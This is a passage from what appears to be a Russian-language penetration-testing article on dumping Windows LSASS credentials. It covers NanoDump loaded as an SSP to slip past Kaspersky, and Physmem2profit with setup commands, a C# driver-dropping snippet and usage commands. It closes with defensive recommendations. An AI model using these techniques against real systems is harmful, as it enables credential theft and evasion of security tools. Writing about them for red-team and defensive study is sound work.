\u0438\u043d\u0442\u0435\u0440\u0435\u0441 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0442\u0435\u0445\u043d\u0438\u043a\u0430 \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438 NanoDump, \u0441\u043a\u043e\u043c\u043f\u0438\u043b\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e \u0432 \u0432\u0438\u0434\u0435 DLL, \u043f\u0440\u044f\u043c\u043e \u0432 LSASS \u043a\u0430\u043a SSP, \u0442\u043e \u0435\u0441\u0442\u044c \u0432 \u0432\u0438\u0434\u0435 \u043f\u0441\u0435\u0432\u0434\u043e\u043f\u0440\u043e\u0432\u0430\u0439\u0434\u0435\u0440\u0430 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 LSA. \u0418\u0441\u0445\u043e\u0434\u044f \u0438\u0437 \u043d\u0430\u0448\u0435\u0433\u043e \u043e\u043f\u044b\u0442\u0430, \u043d\u0430 \u0434\u0430\u043d\u043d\u044b\u0439 \u043c\u043e\u043c\u0435\u043d\u0442 \u044d\u0442\u043e \u0438 \u0435\u0441\u0442\u044c \u0441\u043b\u0430\u0431\u043e\u0435 \u043c\u0435\u0441\u0442\u043e \u00ab\u041a\u0430\u0441\u043f\u0435\u0440\u0441\u043a\u043e\u0433\u043e\u00bb.<\/p>\n<p>\u0414\u043b\u044f \u0442\u043e\u0433\u043e, \u0447\u0442\u043e\u0431\u044b \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u044d\u0442\u043e\u0439 \u0442\u0435\u0445\u043d\u0438\u043a\u043e\u0439 \u0431\u0435\u0437 \u0441\u0435\u0441\u0441\u0438\u0438 Cobalt Strike, \u043c\u043e\u0434\u0435\u043b\u0438\u0440\u0443\u0435\u043c\u044b\u0439 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u0434\u043e\u043b\u0436\u0435\u043d \u043f\u0440\u0438\u043d\u0435\u0441\u0442\u0438 \u043d\u0430 \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u0443\u0437\u0435\u043b 2 \u0431\u0438\u043d\u0430\u0440\u044f: \u0437\u0430\u0433\u0440\u0443\u0437\u0447\u0438\u043a \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0438 SSP \u0438, \u0441\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u043e, \u0441\u0430\u043c\u0443 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0443 SSP. \u041f\u043e\u043b\u0430\u0433\u0430\u044e, \u0447\u0442\u043e \u0432 \u0441\u043a\u043e\u0440\u043e\u043c \u0432\u0440\u0435\u043c\u0435\u043d\u0438 \u043e\u0431\u0430 \u043e\u043d\u0438 \u043d\u0430\u0447\u043d\u0443\u0442 \u0434\u0435\u0442\u0435\u043a\u0442\u0438\u0442\u044c\u0441\u044f \u043f\u043e \u043a\u0440\u0430\u0439\u043d\u0435\u0439 \u043c\u0435\u0440\u0435 \u043d\u0430 \u0443\u0440\u043e\u0432\u043d\u0435 \u0441\u0438\u0433\u043d\u0430\u0442\u0443\u0440\u043d\u043e\u0433\u043e \u0430\u043d\u0430\u043b\u0438\u0437\u0430, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0432\u0448\u0438\u0441\u044c \u043f\u0440\u0438\u043c\u0435\u0440\u043e\u043c <a href=\"https:\/\/s3cur3th1ssh1t.github.io\/Reflective-Dump-Tools\/\">\u0438\u0437 \u044d\u0442\u043e\u0433\u043e \u0440\u0435\u0441\u0435\u0440\u0447\u0430<\/a> \u043e\u0442 <a href=\"https:\/\/twitter.com\/ShitSecure\">@ShitSecure<\/a> \u043c\u044b \u043d\u0430\u043f\u0438\u043b\u0438\u043b\u0438 \u0441\u0432\u043e\u0439 \u0437\u0430\u0433\u0440\u0443\u0437\u0447\u0438\u043a NanoDump SSP \u0438\u0437 \u043f\u0430\u043c\u044f\u0442\u0438 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043a\u0440\u0435\u0434\u043b\u0430 \u043d\u0430 PowerShell.<\/p>\n<figure class=\"full-width\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/a32\/b1b\/667\/a32b1b66748273406fee81c85637c1e1.png\" alt=\"\u0414\u0430\u043c\u043f\u0438\u043c LSASS \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e NanoDump SSP \u0438 \u0432\u043e\u0441\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u0435\u043c \u043f\u043e\u0432\u0440\u0435\u0436\u0434\u0435\u043d\u043d\u0443\u044e \u0441\u0438\u0433\u043d\u0430\u0442\u0443\u0440\u0443\" title=\"\u0414\u0430\u043c\u043f\u0438\u043c LSASS \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e NanoDump SSP \u0438 \u0432\u043e\u0441\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u0435\u043c \u043f\u043e\u0432\u0440\u0435\u0436\u0434\u0435\u043d\u043d\u0443\u044e \u0441\u0438\u0433\u043d\u0430\u0442\u0443\u0440\u0443\" width=\"1009\" height=\"951\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/a32\/b1b\/667\/a32b1b66748273406fee81c85637c1e1.png\"\/><figcaption>\u0414\u0430\u043c\u043f\u0438\u043c LSASS \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e NanoDump SSP \u0438 \u0432\u043e\u0441\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u0435\u043c \u043f\u043e\u0432\u0440\u0435\u0436\u0434\u0435\u043d\u043d\u0443\u044e \u0441\u0438\u0433\u043d\u0430\u0442\u0443\u0440\u0443<\/figcaption><\/figure>\n<p>\u041d\u0430\u043c\u0435\u0440\u0435\u043d\u043d\u043e \u043d\u0435 \u0440\u0430\u0441\u043a\u0440\u044b\u0432\u0430\u044e \u0438\u0441\u0445\u043e\u0434\u043d\u0438\u043a \u043a\u0440\u0435\u0434\u043b\u0430 (\u0442\u0435\u043c \u0431\u043e\u043b\u0435\u0435, \u0447\u0442\u043e \u0432 \u043f\u0440\u0438\u0432\u0435\u0434\u0435\u043d\u043d\u043e\u0439 \u0432\u044b\u0448\u0435 \u0441\u0442\u0430\u0442\u044c\u0435 \u0432\u0441\u0435 \u0435\u0441\u0442\u044c), \u0438\u0431\u043e \u043d\u0430\u0434\u0435\u044e\u0441\u044c, \u0447\u0442\u043e \u044d\u0442\u043e\u0442 \u043c\u0435\u0442\u043e\u0434 \u043f\u0440\u043e\u0436\u0438\u0432\u0435\u0442 \u0445\u043e\u0442\u044f \u0431\u044b \u0435\u0449\u0435 \u043d\u0435\u043c\u043d\u043e\u0433\u043e. \u041d\u0443 \u0430 \u0432 \u043e\u0431\u0449\u0435\u043c, \u0441\u043c\u0438\u0440\u0435\u043d\u043d\u043e \u0436\u0434\u0435\u043c, \u043a\u043e\u0433\u0434\u0430 \u0438 \u044d\u0442\u0430 \u0442\u0435\u0445\u043d\u0438\u043a\u0430 \u043d\u0430\u0447\u043d\u0435\u0442 \u00ab\u043f\u0430\u043b\u0438\u0442\u044c\u0441\u044f\u00bb KES, \u0447\u0442\u043e\u0431\u044b \u043d\u0430\u0447\u0430\u0442\u044c \u0438\u0441\u043a\u0430\u0442\u044c \u043d\u043e\u0432\u044b\u0435 \u0443\u0445\u0438\u0449\u0440\u0435\u043d\u0438\u044f \u0434\u043b\u044f \u0434\u0430\u043c\u043f\u0430 \u043f\u0430\u043c\u044f\u0442\u0438 LSASS&#8230;<\/p>\n<h2>Physmem2profit<\/h2>\n<p>\u041f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u043c \u0442\u0432\u043e\u0440\u0435\u043d\u0438\u0435\u043c, \u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u043c\u044b \u0441\u0435\u0433\u043e\u0434\u043d\u044f \u0440\u0430\u0441\u0441\u043c\u043e\u0442\u0440\u0438\u043c, \u0431\u0443\u0434\u0435\u0442 \u043f\u0440\u043e\u0435\u043a\u0442 <a href=\"https:\/\/github.com\/FSecureLABS\/physmem2profit\">Physmem2profit<\/a> \u043e\u0442 F-Secure LABS. \u0415\u0433\u043e \u043f\u043e\u0434\u0445\u043e\u0434 \u043a \u0434\u0430\u043c\u043f\u0443 LSASS \u043e\u0442\u043b\u0438\u0447\u0430\u0435\u0442\u0441\u044f \u043e\u0442 \u043e\u0441\u0442\u0430\u043b\u044c\u043d\u044b\u0445 \u0442\u0435\u043c, \u0447\u0442\u043e \u0432\u043c\u0435\u0441\u0442\u043e \u0442\u043e\u0433\u043e, \u0447\u0442\u043e\u0431\u044b \u0441\u043e\u0441\u0440\u0435\u0434\u043e\u0442\u0430\u0447\u0438\u0432\u0430\u0442\u044c\u0441\u044f \u043d\u0430 \u043c\u0435\u0442\u043e\u0434\u0430\u0445 \u0443\u043a\u043b\u043e\u043d\u0435\u043d\u0438\u044f \u043e\u0442 \u0445\u0443\u043a\u043e\u0432 AV \/ EDR \u0432 userland, \u043e\u043d \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 <strong>\u0434\u0440\u0430\u0439\u0432\u0435\u0440<\/strong> WinPmem (\u0447\u0430\u0441\u0442\u044c \u0444\u043e\u0440\u0435\u043d\u0437\u0438\u043a-\u043f\u0440\u043e\u0435\u043a\u0442\u0430 <a href=\"https:\/\/github.com\/google\/rekall\">rekall<\/a>) \u0434\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a\u043e \u0432\u0441\u0435\u0439 \u0444\u0438\u0437\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u043f\u0430\u043c\u044f\u0442\u0438 \u0446\u0435\u043b\u0435\u0432\u043e\u0433\u043e \u0443\u0437\u043b\u0430 \u0438 \u0438\u0449\u0435\u0442 \u0442\u0430\u043c \u043e\u0431\u043b\u0430\u0441\u0442\u044c, \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u044e\u0449\u0443\u044e \u043f\u0430\u043c\u044f\u0442\u0438 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430 lsass.exe, \u0447\u0435\u0440\u0435\u0437 \u043c\u043e\u043d\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u0432\u0438\u0440\u0442\u0443\u0430\u043b\u044c\u043d\u043e\u0439 \u0424\u0421 <a href=\"https:\/\/en.wikipedia.org\/wiki\/Filesystem_in_Userspace\">FUSE<\/a>.<\/p>\n<p>\u041f\u043e\u043a\u0430\u0436\u0435\u043c \u0432 \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0438, \u043a\u0430\u043a \u0437\u0430\u0441\u0442\u0430\u0432\u0438\u0442\u044c \u044d\u0442\u043e \u0447\u0443\u0434\u043e \u0440\u0430\u0431\u043e\u0442\u0430\u0442\u044c:<\/p>\n<ol>\n<li>\n<p>\u0414\u043b\u044f \u043d\u0430\u0447\u0430\u043b\u0430 \u043a\u043b\u043e\u043d\u0438\u0440\u0443\u0435\u043c \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u0439 \u043f\u0440\u043e\u0435\u043a\u0442\u0430, \u0440\u0435\u043a\u0443\u0440\u0441\u0438\u0432\u043d\u043e \u0440\u0430\u0437\u0440\u0435\u0448\u0430\u044f \u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u0432\u0438\u0434\u0435 git-\u043f\u043e\u0434\u043c\u043e\u0434\u0443\u043b\u0435\u0439.<\/p>\n<\/li>\n<li>\n<p>\u0414\u0430\u043b\u0435\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u0438\u043c \u0432\u0435\u0440\u0441\u0438\u0438 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a <code>acora<\/code> \u0438 <code>pycryptodome<\/code> \u0432 \u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e\u0441\u0442\u044f\u0445 <code>rekall-core<\/code>, \u0447\u0442\u043e\u0431\u044b \u043e\u043d\u0438 \u0434\u0440\u0443\u0436\u0438\u043b\u0438 \u0441 \u0430\u043a\u0442\u0443\u0430\u043b\u044c\u043d\u044b\u043c Python 3.<\/p>\n<\/li>\n<li>\n<p>\u0422\u0435\u043f\u0435\u0440\u044c \u043c\u043e\u0436\u043d\u043e \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u0442\u044c \u0438\u043d\u0441\u0442\u0430\u043b\u043b\u0435\u0440, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043d\u0430\u043a\u0430\u0442\u0438\u0442 \u043f\u0438\u0442\u043e\u043d\u044f\u0447\u0443\u044e \u0432\u0438\u0440\u0442\u0443\u0430\u043b\u044c\u043d\u0443\u044e \u0441\u0440\u0435\u0434\u0443 \u0438 \u043f\u043e\u0441\u0442\u0430\u0432\u0438\u0442 \u0432\u0441\u0435, \u0447\u0442\u043e \u0435\u043c\u0443 \u043d\u0443\u0436\u043d\u043e.<\/p>\n<\/li>\n<\/ol>\n<details class=\"spoiler\">\n<summary>Cmd<\/summary>\n<div class=\"spoiler__content\">\n<pre><code class=\"bash\">git clone --recursive https:\/\/github.com\/FSecureLABS\/physmem2profit cd physmem2profit\/client sed -i 's\/acora==2.1\/acora\/g' rekall\/rekall-core\/setup.py sed -i 's\/pycryptodome==3.4.7\/pycryptodome\/g' rekall\/rekall-core\/setup.py bash install.sh source .env\/bin\/activate<\/code><\/pre>\n<\/p>\n<\/div>\n<\/details>\n<figure class=\"full-width\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/41b\/267\/881\/41b2678817fc124c47690468098e467f.png\" alt=\"\u0423\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0430 Physmem2profit\" title=\"\u0423\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0430 Physmem2profit\" width=\"1175\" height=\"780\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/41b\/267\/881\/41b2678817fc124c47690468098e467f.png\"\/><figcaption>\u0423\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0430 Physmem2profit<\/figcaption><\/figure>\n<p>\u0421\u043b\u0435\u0434\u0443\u044f \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u044f\u043c <a href=\"https:\/\/github.com\/FSecureLABS\/physmem2profit\/issues\/7\">\u0438\u0437 \u044d\u0442\u043e\u0433\u043e issue<\/a>, \u044f \u0441\u043a\u0430\u0447\u0430\u043b \u043a\u0440\u0430\u0439\u043d\u0438\u0439 <a href=\"https:\/\/github.com\/Velocidex\/WinPmem\/releases\/tag\/v4.0.rc1\">\u0440\u0435\u043b\u0438\u0437<\/a> WinPmem (\u043d\u0430\u043c \u043f\u043e\u043d\u0430\u0434\u043e\u0431\u0438\u0442\u0441\u044f \u0442\u043e\u043b\u044c\u043a\u043e \u0444\u0430\u0439\u043b <code>kernel\/binaries\/winpmem_x64.sys<\/code>) \u0438 \u043e\u0431\u043d\u043e\u0432\u0438\u043b <a href=\"https:\/\/github.com\/FSecureLABS\/physmem2profit\/blob\/296d8fefecf2c852b955d01bad97f89c3194322f\/server\/Plugins\/WinPmem.cs#L16-L17\">\u044d\u0442\u0438 \u043a\u043e\u043d\u0441\u0442\u0430\u043d\u0442\u044b<\/a> \u0434\u043b\u044f \u0438\u0437\u043c\u0435\u043d\u0438\u0432\u0448\u0435\u0433\u043e\u0441\u044f <a href=\"https:\/\/github.com\/Velocidex\/WinPmem\/blob\/e503038acfa3f4d3469341f6e126ef2958c342c3\/kernel\/userspace_interface\/winpmem_shared.h#L46-L52\">\u0438\u043d\u0442\u0435\u0440\u0444\u0435\u0439\u0441\u0430<\/a> \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f \u0441 \u0434\u0440\u0430\u0439\u0432\u0435\u0440\u043e\u043c. \u0412\u043d\u0435\u0441\u0435\u043d\u043d\u044b\u0435 <a href=\"https:\/\/github.com\/snovvcrash\/physmem2profit\/commit\/db122920c6eb46e5337112e227d7b3ee6ff9dd9f\">\u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u044f<\/a> \u043c\u043e\u0436\u043d\u043e \u043f\u043e\u0441\u043c\u043e\u0442\u0440\u0435\u0442\u044c \u0432 \u043c\u043e\u0435\u043c \u0444\u043e\u0440\u043a\u0435 \u043f\u0440\u043e\u0435\u043a\u0442\u0430.<\/p>\n<p>\u0422\u0430\u043a\u0436\u0435 \u0441\u0440\u0435\u0434\u0438 \u0432\u043d\u0435\u0441\u0435\u043d\u043d\u044b\u0445 \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u0439 \u2014 \u0437\u0430\u0445\u0430\u0440\u0434\u043a\u043e\u0436\u0435\u043d\u043d\u044b\u0439 \u0444\u0430\u0439\u043b \u0434\u0440\u0430\u0439\u0432\u0435\u0440\u0430, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u043a\u043b\u0430\u0434\u0435\u0442\u0441\u044f \u0432 \u0444\u0430\u0439\u043b\u043e\u0432\u0443\u044e \u0441\u0438\u0441\u0442\u0435\u043c\u0443 \u00ab\u0436\u0435\u0440\u0442\u0432\u044b\u00bb \u043f\u0435\u0440\u0435\u0434 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u043e\u0439 \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u044e\u0449\u0435\u0439 \u0441\u043b\u0443\u0436\u0431\u044b \u0438 \u0441\u0442\u0438\u0440\u0430\u0435\u0442\u0441\u044f \u043f\u043e\u0441\u043b\u0435 \u0435\u0435 \u043e\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0438 \u0438 \u0443\u0434\u0430\u043b\u0435\u043d\u0438\u044f:<\/p>\n<pre><code class=\"cs\">static byte[] Decompress(byte[] data) {     MemoryStream input = new MemoryStream(data);     MemoryStream output = new MemoryStream();     using (DeflateStream dStream = new DeflateStream(input, CompressionMode.Decompress))         dStream.CopyTo(output);      return output.ToArray(); }  \/\/ ...  Program.Log(\"Installing service...\"); var sysCompressed = Convert.FromBase64String(\"&lt;WINPMEM_BYTES_BASE64>\"); var sysRawBytes = Decompress(sysCompressed); File.WriteAllBytes(pathToDriver, sysRawBytes); OpenOrCreate(pathToDriver); Program.Log(\"Service created successfully.\", Program.LogMessageSeverity.Success);  \/\/ ...  CloseHandle(_hDevice); Stop(); Delete(); File.Delete(Globals.pathToDriver); Program.Log(\"Successfully unloaded the WinPMem driver.\", Program.LogMessageSeverity.Success);<\/code><\/pre>\n<p>\u0421\u043c\u043e\u0442\u0440\u0438\u043c, \u043a\u0430\u043a \u0432\u0441\u0435\u043c \u044d\u0442\u0438\u043c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f:<\/p>\n<pre><code># Server-side PS > .\\Physmem2profit.exe --ip &lt;LHOST> --port &lt;LPORT> [--verbose] [--hidden]  # Client-side ~$ python3 physmem2profit --host &lt;RHOST> --port &lt;RPORT> --install \"C:\/Windows\/Temp\/winpmem_x64.sys\" --mode all --driver winpmem<\/code><\/pre>\n<p>\u0427\u0442\u043e\u0431\u044b \u043d\u0435 \u0443\u043f\u0443\u0441\u043a\u0430\u0442\u044c \u043f\u0440\u0435\u0438\u043c\u0443\u0449\u0435\u0441\u0442\u0432 C#, \u043d\u0430 \u043a\u043e\u0442\u043e\u0440\u043e\u043c \u043d\u0430\u043f\u0438\u0441\u0430\u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u043d\u0430\u044f \u0447\u0430\u0441\u0442\u044c, \u043f\u0440\u043e\u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0438\u0440\u0443\u0435\u043c \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u0441\u0431\u043e\u0440\u043a\u0438 \u0438\u0437 \u043f\u0430\u043c\u044f\u0442\u0438.<\/p>\n<figure class=\"full-width\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/9a7\/aa9\/b07\/9a7aa9b07ad4b15ae137ff44fd1e683d.png\" alt=\"\u0414\u0430\u043c\u043f\u0438\u043c LSASS \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e Physmem2profit\" title=\"\u0414\u0430\u043c\u043f\u0438\u043c LSASS \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e Physmem2profit\" width=\"1805\" height=\"1065\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/9a7\/aa9\/b07\/9a7aa9b07ad4b15ae137ff44fd1e683d.png\"\/><figcaption>\u0414\u0430\u043c\u043f\u0438\u043c LSASS \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e Physmem2profit<\/figcaption><\/figure>\n<p>\u0412\u0443\u0430\u043b\u044f, \u0445\u0435\u0448\u0438 \u0438\u0437 LSASS \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u044b!<\/p>\n<h2>\u041f\u0440\u043e\u0442\u0438\u0432\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0435<\/h2>\n<p>\u0412\u043c\u0435\u0441\u0442\u043e \u0437\u0430\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0435\u0434\u0443 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0439, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043f\u043e\u043c\u043e\u0433\u0443\u0442 \u0441\u0432\u0435\u0441\u0442\u0438 \u043a \u043c\u0438\u043d\u0438\u043c\u0443\u043c\u0443 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438 \u0434\u043b\u044f \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430 \u0441\u0434\u0430\u043c\u043f\u0438\u0442\u044c LSASS \u0438\u043b\u0438 \u0438\u0437\u0432\u043b\u0435\u0447\u044c \u0438\u0437 \u0441\u0434\u0435\u043b\u0430\u043d\u043d\u043e\u0433\u043e \u0441\u043b\u0435\u043f\u043a\u0430 \u0437\u043d\u0430\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u0443\u044e \u0432\u044b\u0433\u043e\u0434\u0443:<\/p>\n<ul>\n<li>\n<p>\u0421\u0432\u0435\u0441\u0442\u0438 \u043a \u043c\u0438\u043d\u0438\u043c\u0443\u043c\u0443 \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u043b\u044e\u0431\u044b\u043c \u0441\u0435\u0442\u0435\u0432\u044b\u043c \u0443\u0437\u043b\u0430\u043c \u0432 \u0434\u043e\u043c\u0435\u043d\u0435 \u0441 \u0443\u0447\u0435\u0442\u043d\u044b\u043c\u0438 \u0434\u0430\u043d\u043d\u044b\u043c\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439, \u0432\u0445\u043e\u0434\u044f\u0449\u0438\u0445 \u0432 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0434\u043e\u043c\u0435\u043d\u043d\u044b\u0435 \u0433\u0440\u0443\u043f\u043f\u044b (Domain Admins, Enterprise Admins, Administrators \u0438 \u0434\u0440.), \u0430 \u0434\u043b\u044f \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 \u0438 \u0440\u0430\u0431\u043e\u0447\u0438\u0445 \u0441\u0442\u0430\u043d\u0446\u0438\u0439 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0432\u044b\u0434\u0435\u043b\u0435\u043d\u043d\u044b\u0435 \u0434\u043b\u044f \u0434\u0430\u043d\u043d\u044b\u0445 \u0446\u0435\u043b\u0435\u0439 \u0423\u0417 \u0441 \u043c\u0438\u043d\u0438\u043c\u0430\u043b\u044c\u043d\u043e \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u044b\u043c \u043d\u0430\u0431\u043e\u0440\u043e\u043c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 (\u0441\u043c\u043e\u0442\u0440\u0438\u043c \u043a\u043e\u043d\u0446\u0435\u043f\u0446\u0438\u044e <a href=\"https:\/\/stealthbits.com\/blog\/cutting-down-the-red-forest\/\">Tiered Access Model<\/a>).<\/p>\n<\/li>\n<li>\n<p>\u041d\u0430\u0441\u0442\u0440\u043e\u0438\u0442\u044c \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 <a href=\"https:\/\/docs.microsoft.com\/ru-ru\/windows\/security\/identity-protection\/remote-credential-guard\">Remote Credential Guard<\/a> \u0434\u043b\u044f \u043f\u0440\u0435\u0434\u043e\u0442\u0432\u0440\u0430\u0449\u0435\u043d\u0438\u044f \u0441\u043e\u0445\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u043f\u0440\u0438 \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u0438 \u043a \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u044b\u043c \u0441\u0435\u0442\u0435\u0432\u044b\u043c \u0443\u0437\u043b\u0430\u043c \u043f\u043e \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0443 RDP \u0434\u043b\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u0423\u0417.<\/p>\n<\/li>\n<li>\n<p>\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c <a href=\"https:\/\/docs.microsoft.com\/ru-ru\/windows-server\/security\/credentials-protection-and-management\/configuring-additional-lsa-protection\">Protected Process<\/a> (PPL) \u0434\u043b\u044f \u043f\u0440\u0435\u0434\u043e\u0442\u0432\u0440\u0430\u0449\u0435\u043d\u0438\u044f \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0439 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438 \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a \u043f\u0430\u043c\u044f\u0442\u0438 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430 lsass.exe.<\/p>\n<\/li>\n<li>\n<p>\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0433\u0440\u0443\u043f\u043f\u0443 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 Windows \u00ab<a href=\"https:\/\/docs.microsoft.com\/ru-ru\/windows-server\/identity\/ad-ds\/manage\/how-to-configure-protected-accounts\">\u0417\u0430\u0449\u0438\u0449\u0435\u043d\u043d\u044b\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0438<\/a>\u00bb (Protected Users Security Group) \u0438 \u0434\u043e\u0431\u0430\u0432\u0438\u0442\u044c \u0432 \u043d\u0435\u0435 \u0423\u0417 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0432\u0430\u0436\u043d\u044b\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u043e\u0432 \u0434\u043e\u043c\u0435\u043d\u0430 (\u044d\u0442\u0430 \u0444\u0438\u0447\u0430 \u0442\u0440\u0435\u0431\u0443\u0435\u0442 \u0442\u0435\u0441\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f 